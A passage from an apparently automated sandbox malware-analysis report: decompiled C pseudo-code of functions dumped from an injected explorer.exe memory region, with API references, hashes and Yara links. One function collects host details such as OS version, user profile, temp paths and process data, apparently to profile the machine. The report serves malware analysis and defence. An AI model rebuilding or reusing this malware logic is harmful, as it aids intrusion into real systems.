						 *((intOrPtr*)(_t41 + 0xc))(_v8);
						return 0;
					}
					do {
						_v16 = 0;
						_v12 = 0;
						_t48 =  *0xfe68c; // 0x25bfab8
						 *((intOrPtr*)(_t48 + 0xc4))(0,  *((intOrPtr*)(_v8 + _t73 * 4)), 0,  &_v16, 0,  &_v12,  &_v32);
						_t70 = E000E85E5(_v16 + 1);
						if(_t70 != 0) {
							_v12 = 0x200;
							_push( &_v32);
							_push( &_v12);
							_push( &_v544);
							_push( &_v16);
							_push(_t70);
							_push( *((intOrPtr*)(_v8 + _t73 * 4)));
							_t58 =  *0xfe68c; // 0x25bfab8
							_push(0);
							if( *((intOrPtr*)(_t58 + 0xc4))() != 0) {
								E000E48F8(_t77,  *((intOrPtr*)(_v8 + _t73 * 4)), _t70, _a4);
								_t75 = _t75 + 0xc;
								Sleep(0xa);
							}
						}
						_t73 = _t73 + 1;
					} while (_t73 < _v20);
					goto L9;
				}
				return _t40 | 0xffffffff;
			}

0x000ee308
0x000ee31b
0x000ee322
0x000ee32b
0x000ee333
0x000ee339
0x000ee33e
0x000ee349
0x000ee34e
0x000ee3e7
0x000ee3e7
0x000ee3ef
0x00000000
0x000ee3f4
0x000ee355
0x000ee358
0x000ee35f
0x000ee36f
0x000ee375
0x000ee385
0x000ee38a
0x000ee38f
0x000ee396
0x000ee39a
0x000ee3a1
0x000ee3a5
0x000ee3a9
0x000ee3aa
0x000ee3ad
0x000ee3b2
0x000ee3bb
0x000ee3c7
0x000ee3d1
0x000ee3d6
0x000ee3d6
0x000ee3bb
0x000ee3dc
0x000ee3dd
0x00000000
0x000ee3e6
0x00000000

APIs

Sleep.KERNELBASE(0000000A), ref: 000EE3D6

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: eea549f52a96c0feb632125facf1f4dd12a16c3cca1492766713e738c5f3ae34
Instruction ID: eb326b5563981a314859bb4a280f6ee62910d4aa08b74bc9ef8c12bbcbf48b79
Opcode Fuzzy Hash: eea549f52a96c0feb632125facf1f4dd12a16c3cca1492766713e738c5f3ae34
Instruction Fuzzy Hash: 7F31E7B690024DAFEB11DF94CD88DEEBBBCEB44350F1142A6B515E7251DB309A05CB61

Uniqueness

Uniqueness Score: -1.00%

Function 000EA3D8, Relevance: 1.3, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000EA3D8(signed int __ecx, intOrPtr* __edx, void* __fp0) {
				intOrPtr _v8;
				signed int _v16;
				char _v20;
				void* _t24;
				char _t25;
				signed int _t30;
				intOrPtr* _t45;
				signed int _t46;
				void* _t47;
				void* _t54;

				_t54 = __fp0;
				_t45 = __edx;
				_t46 = 0;
				_t30 = __ecx;
				if( *__edx > 0) {
					do {
						_t24 = E000E9E9B(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8))); // executed
						if(_t24 == 0) {
							_t25 = E000E972A( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8)));
							_v8 = _t25;
							if(_t25 != 0) {
								L6:
								_v16 = _v16 & 0x00000000;
								_v20 = _t25;
								E000EA076(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8)), _t54,  &_v20, 8, 2); // executed
								_t47 = _t47 + 0xc;
							} else {
								if(GetLastError() != 0xd) {
									_t25 = _v8;
									goto L6;
								} else {
									E000E9F13( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8))); // executed
								}
							}
						}
						_t46 = _t46 + 1;
					} while (_t46 <  *_t45);
				}
				return 0;
			}

0x000ea3d8
0x000ea3e1
0x000ea3e3
0x000ea3e5
0x000ea3e9
0x000ea3eb
0x000ea3f3
0x000ea3fa
0x000ea403
0x000ea408
0x000ea40d
0x000ea431
0x000ea436
0x000ea43c
0x000ea448
0x000ea44d
0x000ea40f
0x000ea418
0x000ea42e
0x00000000
0x000ea41a
0x000ea426
0x000ea42b
0x000ea418
0x000ea40d
0x000ea450
0x000ea451
0x000ea3eb
0x000ea45b

APIs

Part of subcall function 000E972A: SetLastError.KERNEL32(0000000D,00000000,00000000,000EA32C,00000000,00000000,?,?,?,000E5AD4), ref: 000E9763

GetLastError.KERNEL32(00000000,?,00000000,?,?,?,?,000E4C53,?,?,00000000), ref: 000EA40F

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 0e14bc02560a14c26d34e23cdfa5e9aacd4edc0cf702d0027d631582b134fa8b
Instruction ID: fde63b154550a3ccb4e7aae9d148cd0616a7b76224d5996fdf4cb73b17656d23
Opcode Fuzzy Hash: 0e14bc02560a14c26d34e23cdfa5e9aacd4edc0cf702d0027d631582b134fa8b
Instruction Fuzzy Hash: 0C11A5B9B00105AFCB10DF5AC48596EB3A5BBC9304F208169D415A7392DB70FD05CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 000E5D5E, Relevance: 1.3, APIs: 1, Instructions: 49
stringCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E000E5D5E(void* __eflags) {
				char _v44;
				intOrPtr _t7;
				intOrPtr _t10;
				void* _t11;
				WCHAR* _t12;
				WCHAR* _t13;
				WCHAR* _t14;
				intOrPtr _t15;
				intOrPtr _t19;
				intOrPtr _t22;
				void* _t27;
				WCHAR* _t28;

				_t7 =  *0xfe688; // 0x80000
				E000EA8AF( &_v44,  *((intOrPtr*)(_t7 + 0xac)) + 4, __eflags);
				_t10 =  *0xfe684; // 0x25bf8f0
				_t28 = 2;
				_t11 =  *((intOrPtr*)(_t10 + 0xbc))(_t28, 0,  &_v44, _t27);
				if(_t11 == 0) {
					_t22 =  *0xfe688; // 0x80000
					_t12 = E000E5967( *((intOrPtr*)(_t22 + 0xac)), 0, __eflags); // executed
					 *0xfe6ac = _t12;
					__eflags = _t12;
					if(_t12 != 0) {
						_t14 = E000E9E86();
						__eflags = _t14;
						if(_t14 == 0) {
							_t28 = 0;
							__eflags = 0;
						} else {
							_t15 =  *0xfe688; // 0x80000
							lstrcmpiW(_t15 + 0x228, _t14);
							asm("sbb esi, esi");
							_t28 = _t28 + 1;
						}
					}
					_t13 = _t28;
				} else {
					_t19 =  *0xfe684; // 0x25bf8f0
					 *((intOrPtr*)(_t19 + 0x30))(_t11);
					_t13 = 3;
				}
				return _t13;
			}

0x000e5d61
0x000e5d76
0x000e5d7f
0x000e5d88
0x000e5d8a
0x000e5d92
0x000e5da2
0x000e5db0
0x000e5db5
0x000e5dba
0x000e5dbc
0x000e5dbe
0x000e5dc3
0x000e5dc5
0x000e5de0
0x000e5de0
0x000e5dc7
0x000e5dc8
0x000e5dd3
0x000e5ddb
0x000e5ddd
0x000e5ddd
0x000e5dc5
0x000e5de2
0x000e5d94
0x000e5d95
0x000e5d9a
0x000e5d9f
0x000e5d9f
0x000e5de6

APIs

lstrcmpiW.KERNEL32(0007FDD8,00000000), ref: 000E5DD3

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: e5f55527d415a7735692eb2196968c0eb8b6ad3d3c70d324e0f7352d0dc9091d
Instruction ID: 061d61c7de9e7751382a4a586d6f7a563171fdd923b8586f294a7e7fd0fc3337
Opcode Fuzzy Hash: e5f55527d415a7735692eb2196968c0eb8b6ad3d3c70d324e0f7352d0dc9091d
Instruction Fuzzy Hash: F001D4317001949FF760E76BDC4AFAA33E8AF18785F454420F101FB5A2DE24E900CB61

Uniqueness

Uniqueness Score: -1.00%

Function 000EBA47, Relevance: 1.3, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000EBA47() {
				signed int _v8;
				signed int _v12;
				intOrPtr _t15;
				void* _t16;
				void* _t18;
				void* _t21;
				intOrPtr _t22;
				void* _t24;
				void* _t30;

				_v8 = _v8 & 0x00000000;
				_t15 =  *0xfe68c; // 0x25bfab8
				_t16 =  *((intOrPtr*)(_t15 + 0x70))(_t24, 8,  &_v8, _t24, _t24);
				if(_t16 != 0) {
					_v12 = _v12 & 0x00000000;
					_t18 = E000EB9DA(1,  &_v12); // executed
					_t30 = _t18;
					if(_t30 != 0) {
						CloseHandle(_v8);
						_t21 = _t30;
					} else {
						if(_v8 != _t18) {
							_t22 =  *0xfe684; // 0x25bf8f0
							 *((intOrPtr*)(_t22 + 0x30))(_v8);
						}
						_t21 = 0;
					}
					return _t21;
				} else {
					return _t16;
				}
			}

0x000eba4c
0x000eba54
0x000eba5c
0x000eba61
0x000eba6b
0x000eba74
0x000eba79
0x000eba7e
0x000eba9c
0x000eba9f
0x000eba80
0x000eba83
0x000eba85
0x000eba8d
0x000eba8d
0x000eba90
0x000eba90
0x000ebaa3
0x000eba64
0x000eba64
0x000eba64

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98d7d4456369cc7d4716169e48fc78458393d0a59c1a4c99443f9233a829eb19
Instruction ID: d882cb044591df5b1b048d75c908570d8ee2493e16f684a7f1c9620606e6d4c8
Opcode Fuzzy Hash: 98d7d4456369cc7d4716169e48fc78458393d0a59c1a4c99443f9233a829eb19
Instruction Fuzzy Hash: CEF06931A10149EFDF20DBA6D945AAE77F8EF44399F1540A4F101E7161DB34DE00EB51

Uniqueness

Uniqueness Score: -1.00%

Function 000E5CCD, Relevance: 1.3, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000E5CCD(void* __ecx, void* __eflags, void* __fp0) {
				void _v44;
				signed int _t8;
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t21;
				void* _t24;
				void* _t29;
				void* _t35;

				_t35 = __eflags;
				_t24 = __ecx;
				_t8 =  *0xfe688; // 0x80000
				E000F24D3(_t8,  *((intOrPtr*)(_t8 + 0x224))); // executed
				E000E85D0();
				E000E8F59();
				 *0xfe780 = 0;
				 *0xfe784 = 0;
				 *0xfe77c = 0;
				E000E5E97(); // executed
				E000ECFC6(_t24);
				_t14 =  *0xfe688; // 0x80000
				 *((intOrPtr*)(_t14 + 0xa4)) = 2;
				_t15 =  *0xfe688; // 0x80000
				E000EA8AF( &_v44,  *((intOrPtr*)(_t15 + 0xac)) + 7, _t35);
				E000EB379( &_v44);
				memset( &_v44, 0, 0x27);
				E000E5C07( &_v44, __fp0);
				_t21 =  *0xfe684; // 0x25bf8f0
				 *((intOrPtr*)(_t21 + 0xdc))(0, _t29);
				return 0;
			}

0x000e5ccd
0x000e5ccd
0x000e5cd0
0x000e5cdf
0x000e5ce4
0x000e5ce9
0x000e5cf0
0x000e5cf6
0x000e5cfc
0x000e5d02
0x000e5d07
0x000e5d0c
0x000e5d14
0x000e5d1e
0x000e5d2c
0x000e5d34
0x000e5d40
0x000e5d48
0x000e5d4d
0x000e5d53
0x000e5d5d

APIs

Part of subcall function 000E85D0: HeapCreate.KERNELBASE(00000000,00080000,00000000,000E5F88), ref: 000E85D9

Part of subcall function 000ECFC6: GetCurrentProcess.KERNEL32(?,?,00080000,?,000E3538), ref: 000ECFD2
Part of subcall function 000ECFC6: GetModuleFileNameW.KERNEL32(00000000,00081644,00000105,?,?,00080000,?,000E3538), ref: 000ECFF3
Part of subcall function 000ECFC6: memset.MSVCRT ref: 000ED024
Part of subcall function 000ECFC6: GetVersionExA.KERNEL32(00080000,00080000,?,000E3538), ref: 000ED02F
Part of subcall function 000ECFC6: GetCurrentProcessId.KERNEL32(?,000E3538), ref: 000ED035

Part of subcall function 000EB379: CloseHandle.KERNELBASE(00000000,?,00000000,000E3C7D,?,?,?,?,?,?,?,?,000E3D62,00000000), ref: 000EB3AC

memset.MSVCRT ref: 000E5D40

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: CurrentProcessmemset$CloseCreateFileHandleHeapModuleNameVersion
String ID:
API String ID: 4245722550-0
Opcode ID: 5d44fa04cc257c94d9e8b47cea435b5524b86db6716a0cf00c4956b389d4cb30
Instruction ID: c1b2f51558c0f9d08af18223cb7ded352445cd43294e12a8d49da1de186fb79f
Opcode Fuzzy Hash: 5d44fa04cc257c94d9e8b47cea435b5524b86db6716a0cf00c4956b389d4cb30
Instruction Fuzzy Hash: 5001AD715012989FE600FBA9DC0AEEE3BE4EF18300F450061F004B7633EB74A640DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 000E85FB, Relevance: 1.3, APIs: 1, Instructions: 33
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000E85FB(int _a4, intOrPtr _a8) {
				int _t3;
				intOrPtr _t4;
				void* _t9;

				_t3 = _a4;
				if(_t3 == 0) {
					return _t3;
				}
				_t9 =  *_t3;
				if(_t9 != 0) {
					 *_t3 =  *_t3 & 0x00000000;
					_t4 = _a8;
					if(_t4 != 0xffffffff) {
						if(_t4 == 0xfffffffe) {
							_t4 = E000EC3D4(_t9);
						}
					} else {
						_t4 = E000EC3BB(_t9);
					}
					E000E8730(_t9, 0, _t4);
					_t3 = HeapFree( *0xfe768, 0, _t9); // executed
				}
				return _t3;
			}

0x000e85fe
0x000e8603
0x000e8649
0x000e8649
0x000e8606
0x000e860a
0x000e860c
0x000e860f
0x000e8615
0x000e8623
0x000e8627
0x000e8627
0x000e8617
0x000e8618
0x000e861d
0x000e8630
0x000e8641
0x000e8641
0x00000000

APIs

HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000E8641

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 8944e65ec67195cf755004bfb368618c3fd5520254534777968f3f2d11d56bb8
Instruction ID: 47c7c6fab87f50ae88fdf7dee804181bca3a9dc4b1d9f72b70406ce0c8641fef
Opcode Fuzzy Hash: 8944e65ec67195cf755004bfb368618c3fd5520254534777968f3f2d11d56bb8
Instruction Fuzzy Hash: 6DF0E5319016546FEA602B36AC01FEE37889F01B35F248240F828BB1E1CF25AD0197E9

Uniqueness

Uniqueness Score: -1.00%

Function 000EA7BF, Relevance: 1.3, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000EA7BF(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _t5;
				void* _t6;
				void* _t10;
				long _t15;
				void* _t17;

				_t15 = 2;
				_t5 = E000EA639(_a4, _t15);
				_t17 = _t5;
				if(_t17 != 0) {
					_t6 = E000EA69E(_t17, _a8, _a12); // executed
					if(_t6 != 0) {
						CloseHandle(_t17);
						return 0;
					}
					_t10 = 0xfffffffe;
					return _t10;
				}
				return _t5 | 0xffffffff;
			}

0x000ea7c8
0x000ea7c9
0x000ea7ce
0x000ea7d2
0x000ea7e1
0x000ea7e9
0x000ea7f6
0x00000000
0x000ea7f9
0x000ea7ed
0x00000000
0x000ea7ed
0x00000000

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 32008c30a73cfc9d5ef74051ef9ef3251dd4eefbedb08868829077e5c976ab3e
Instruction ID: c17538ad7c34c12d144aa2f7d9c0aa4ce3a38db7482e009391252f5d5284f512
Opcode Fuzzy Hash: 32008c30a73cfc9d5ef74051ef9ef3251dd4eefbedb08868829077e5c976ab3e
Instruction Fuzzy Hash: A2E061363086555F8B21DA6ADC50C9E37545F8F3707104701F851EB2C1DE30FD414282

Uniqueness

Uniqueness Score: -1.00%

Function 000E9887, Relevance: 1.3, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000E9887(void* __eflags, intOrPtr _a4) {
				intOrPtr _t24;

				_t24 = _a4;
				if(E000EA501( *(_t24 + 0x1c), 0x3a98) >= 0) {
					CloseHandle( *(_t24 + 0x1c));
					 *((intOrPtr*)(_t24 + 0x18)) =  *((intOrPtr*)(_t24 + 8))( *((intOrPtr*)(_t24 + 0xc)));
					if(( *(_t24 + 0x14) & 0x00000001) == 0) {
						E000E982B(_t24, 1);
					}
					return  *((intOrPtr*)(_t24 + 0x18));
				}
				return 0;
			}

0x000e988b
0x000e989d
0x000e98ab
0x000e98b8
0x000e98bb
0x000e98c2
0x000e98c2
0x00000000
0x000e98c7
0x00000000

APIs

CloseHandle.KERNELBASE(?), ref: 000E98AB

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 9792db12870211caf98402f9552ec355e83e85f153846df5105274b836694f51
Instruction ID: f2557290b89a982ba540352e311787e5602287fbfd5814b5159a8810d7b011ff
Opcode Fuzzy Hash: 9792db12870211caf98402f9552ec355e83e85f153846df5105274b836694f51
Instruction Fuzzy Hash: 4BF0A031200B409FC720AF63D940966B7E9EF563507008829E983E3A72DA31F8059791

Uniqueness

Uniqueness Score: -1.00%

Function 000EB379, Relevance: 1.3, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E000EB379(void* __ecx) {
				intOrPtr _t4;
				void* _t5;
				intOrPtr _t6;
				void* _t12;
				void* _t13;

				_t4 =  *0xfe684; // 0x25bf8f0
				_t13 = 0;
				_t5 =  *((intOrPtr*)(_t4 + 0xbc))(2, 0, __ecx);
				_t12 = _t5;
				if(_t12 != 0) {
					_t6 =  *0xfe684; // 0x25bf8f0
					_push(_t12);
					if( *((intOrPtr*)(_t6 + 0xc0))() != 0) {
						_t13 = 1;
					}
					CloseHandle(_t12);
					return _t13;
				}
				return _t5;
			}

0x000eb379
0x000eb381
0x000eb386
0x000eb38c
0x000eb390
0x000eb392
0x000eb397
0x000eb3a0
0x000eb3a4
0x000eb3a4
0x000eb3ac
0x00000000
0x000eb3af
0x000eb3b3

APIs

CloseHandle.KERNELBASE(00000000,?,00000000,000E3C7D,?,?,?,?,?,?,?,?,000E3D62,00000000), ref: 000EB3AC

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 6af4b871f1c26c4dedf0f246b64bf5b1b5c7bd378dc2e7cb349ba9b7b1cbe03c
Instruction ID: 2244d1b1cdaa5b281e04969420e5c6e8d78bb1757f9c06bca3a3c3656ffb1dd4
Opcode Fuzzy Hash: 6af4b871f1c26c4dedf0f246b64bf5b1b5c7bd378dc2e7cb349ba9b7b1cbe03c
Instruction Fuzzy Hash: 82E04F323001609BE6604B6AEC4CF777AA9EFD5A91B060168F905C7222CB248902D7A1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 000ED061, Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 282
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E000ED061(void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				struct _SYSTEM_INFO _v52;
				char _v180;
				char _v692;
				char _v704;
				char _v2680;
				void* __esi;
				struct _OSVERSIONINFOA* _t81;
				intOrPtr _t83;
				void* _t84;
				long _t86;
				intOrPtr* _t88;
				intOrPtr _t90;
				intOrPtr _t95;
				intOrPtr _t97;
				void* _t98;
				intOrPtr _t103;
				char* _t105;
				void* _t108;
				char _t115;
				signed int _t117;
				char _t119;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t130;
				intOrPtr _t134;
				intOrPtr _t147;
				intOrPtr _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				signed int _t159;
				struct HINSTANCE__* _t162;
				short* _t164;
				intOrPtr _t167;
				WCHAR* _t168;
				char* _t169;
				intOrPtr _t181;
				intOrPtr _t200;
				void* _t215;
				char _t218;
				void* _t219;
				char* _t220;
				struct _OSVERSIONINFOA* _t222;
				void* _t223;
				int* _t224;
				void* _t241;

				_t241 = __fp0;
				_t162 =  *0xfe69c; // 0x6cb00000
				_t81 = E000E85E5(0x1ac4);
				_t222 = _t81;
				if(_t222 == 0) {
					return _t81;
				}
				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
				_t83 =  *0xfe684; // 0x25bf8f0
				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
				_t3 = _t222 + 0x648; // 0x648
				E000F2339( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
				_t5 = _t222 + 0x1644; // 0x1644
				_t216 = _t5;
				_t86 = GetModuleFileNameW(0, _t5, 0x105);
				_t227 = _t86;
				if(_t86 != 0) {
					 *((intOrPtr*)(_t222 + 0x1854)) = E000E8F9F(_t216, _t227);
				}
				GetCurrentProcess();
				_t88 = E000EBA47();
				 *((intOrPtr*)(_t222 + 0x110)) = _t88;
				_t178 =  *_t88;
				if(E000EBBCF( *_t88) == 0) {
					_t90 = E000EBAA4(_t178, _t222);
					__eflags = _t90;
					_t181 = (0 | _t90 > 0x00000000) + 1;
					__eflags = _t181;
					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
				} else {
					 *((intOrPtr*)(_t222 + 0x214)) = 3;
				}
				_t12 = _t222 + 0x220; // 0x220
				 *((intOrPtr*)(_t222 + 0x218)) = E000EE433(_t12);
				 *((intOrPtr*)(_t222 + 0x21c)) = E000EE3F8(_t12);
				_push( &_v16);
				 *(_t222 + 0x224) = _t162;
				_push( &_v8);
				_v12 = 0x80;
				_push( &_v692);
				_v8 = 0x100;
				_push( &_v12);
				_t22 = _t222 + 0x114; // 0x114
				_push( *((intOrPtr*)( *((intOrPtr*)(_t222 + 0x110)))));
				_t95 =  *0xfe68c; // 0x25bfab8
				_push(0);
				if( *((intOrPtr*)(_t95 + 0x6c))() == 0) {
					GetLastError();
				}
				_t97 =  *0xfe694; // 0x25bfa48
				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
				_t26 = _t222 + 0x228; // 0x228
				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
				GetLastError();
				_t31 = _t222 + 0x228; // 0x228
				 *((intOrPtr*)(_t222 + 0x434)) = E000E8F9F(_t31, _t98);
				_t34 = _t222 + 0x114; // 0x114
				_t103 = E000EB7EA(_t34,  &_v692);
				_t35 = _t222 + 0xb0; // 0xb0
				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
				_push(_t35);
				E000EB6BF(_t103, _t35, _t98, _t241);
				_t37 = _t222 + 0xb0; // 0xb0
				_t105 = _t37;
				_t38 = _t222 + 0xd0; // 0xd0
				_t164 = _t38;
				if(_t105 != 0) {
					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
					if(_t159 > 0) {
						_t164[_t159] = 0;
					}
				}
				_t41 = _t222 + 0x438; // 0x438
				_t42 = _t222 + 0x228; // 0x228
				E000E8FB9(_t42, _t41);
				_t43 = _t222 + 0xb0; // 0xb0
				_t108 = E000ED442(_t43, E000EC3BB(_t43), 0);
				_t44 = _t222 + 0x100c; // 0x100c
				E000EB8CC(_t108, _t44, _t241);
				_t199 = GetCurrentProcess();
				 *((intOrPtr*)(_t222 + 0x101c)) = E000EBC21(_t110);
				memset(_t222, 0, 0x9c);
				_t224 = _t223 + 0xc;
				_t222->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t222);
				_t167 =  *0xfe684; // 0x25bf8f0
				_t115 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
					_t115 = _v8;
				}
				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
				if(_t115 == 0) {
					GetSystemInfo( &_v52);
					_t117 = _v52.dwOemId & 0x0000ffff;
				} else {
					_t117 = 9;
				}
				_t54 = _t222 + 0x1020; // 0x1020
				_t168 = _t54;
				 *(_t222 + 0x9c) = _t117;
				GetWindowsDirectoryW(_t168, 0x104);
				_t119 = E000E95C2(_t199, 0x10c);
				_t200 =  *0xfe684; // 0x25bf8f0
				_t218 = _t119;
				 *_t224 = 0x104;
				_push( &_v704);
				_push(_t218);
				_v8 = _t218;
				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
					_t154 =  *0xfe684; // 0x25bf8f0
					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
				}
				E000E85B6( &_v8);
				_t124 =  *0xfe684; // 0x25bf8f0
				_t61 = _t222 + 0x1434; // 0x1434
				_t219 = _t61;
				 *_t224 = 0x209;
				_push(_t219);
				_push(L"USERPROFILE");
				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
					E000E9621(_t219, 0x105, L"%s\\%s", _t168);
					_t152 =  *0xfe684; // 0x25bf8f0
					_t224 =  &(_t224[5]);
					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
				}
				_push(0x20a);
				_t64 = _t222 + 0x122a; // 0x122a
				_t169 = L"TEMP";
				_t127 =  *0xfe684; // 0x25bf8f0
				_push(_t169);
				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
					_t149 =  *0xfe684; // 0x25bf8f0
					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
				}
				_push(0x40);
				_t220 = L"SystemDrive";
				_push( &_v180);
				_t130 =  *0xfe684; // 0x25bf8f0
				_push(_t220);
				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
					_t147 =  *0xfe684; // 0x25bf8f0
					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
				}
				_v8 = 0x7f;
				_t72 = _t222 + 0x199c; // 0x199c
				_t134 =  *0xfe684; // 0x25bf8f0
				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
				_t75 = _t222 + 0x100c; // 0x100c
				E000F2339(E000ED442(_t75, E000EC3BB(_t75), 0),  &_v2680);
				_t76 = _t222 + 0x1858; // 0x1858
				E000F230B( &_v2680, _t76, 0x20);
				_t79 = _t222 + 0x1878; // 0x1878
				E000E900E(1, _t79, 0x14, 0x1e,  &_v2680);
				 *((intOrPtr*)(_t222 + 0x1898)) = E000ECD75(_t79);
				return _t222;
			}

0x000ed061
0x000ed06b
0x000ed077
0x000ed07c
0x000ed081
0x000ed441
0x000ed441
0x000ed08e
0x000ed094
0x000ed099
0x000ed09f
0x000ed0af
0x000ed0bb
0x000ed0bb
0x000ed0c4
0x000ed0ca
0x000ed0cc
0x000ed0d5
0x000ed0d5
0x000ed0e1
0x000ed0e5
0x000ed0ea
0x000ed0f0
0x000ed0f9
0x000ed107
0x000ed10e
0x000ed113
0x000ed113
0x000ed114
0x000ed0fb
0x000ed0fb
0x000ed0fb
0x000ed11a
0x000ed125
0x000ed133
0x000ed139
0x000ed13d
0x000ed143
0x000ed14a
0x000ed151
0x000ed155
0x000ed15c
0x000ed15d
0x000ed16a
0x000ed16c
0x000ed171
0x000ed17e
0x000ed180
0x000ed180
0x000ed182
0x000ed18c
0x000ed198
0x000ed1a8
0x000ed1ae
0x000ed1b4
0x000ed1b6
0x000ed1c7
0x000ed1cd
0x000ed1d3
0x000ed1d8
0x000ed1de
0x000ed1e4
0x000ed1e9
0x000ed1ee
0x000ed1ee
0x000ed1f4
0x000ed1f4
0x000ed1fd
0x000ed209
0x000ed211
0x000ed215
0x000ed215
0x000ed211
0x000ed219
0x000ed21f
0x000ed225
0x000ed22c
0x000ed23d
0x000ed243
0x000ed24b
0x000ed252
0x000ed265
0x000ed26b
0x000ed270
0x000ed273
0x000ed276
0x000ed27c
0x000ed282
0x000ed284
0x000ed28a
0x000ed293
0x000ed296
0x000ed296
0x000ed299
0x000ed2a1
0x000ed2ac
0x000ed2b2
0x000ed2a3
0x000ed2a5
0x000ed2a5
0x000ed2bb
0x000ed2bb
0x000ed2c1
0x000ed2c9
0x000ed2d4
0x000ed2d9
0x000ed2df
0x000ed2e1
0x000ed2ee
0x000ed2ef
0x000ed2f0
0x000ed2fb
0x000ed2fd
0x000ed304
0x000ed304
0x000ed30e
0x000ed313
0x000ed318
0x000ed318
0x000ed31e
0x000ed325
0x000ed326
0x000ed333
0x000ed346
0x000ed34b
0x000ed350
0x000ed359
0x000ed359
0x000ed35f
0x000ed364
0x000ed36a
0x000ed370
0x000ed375
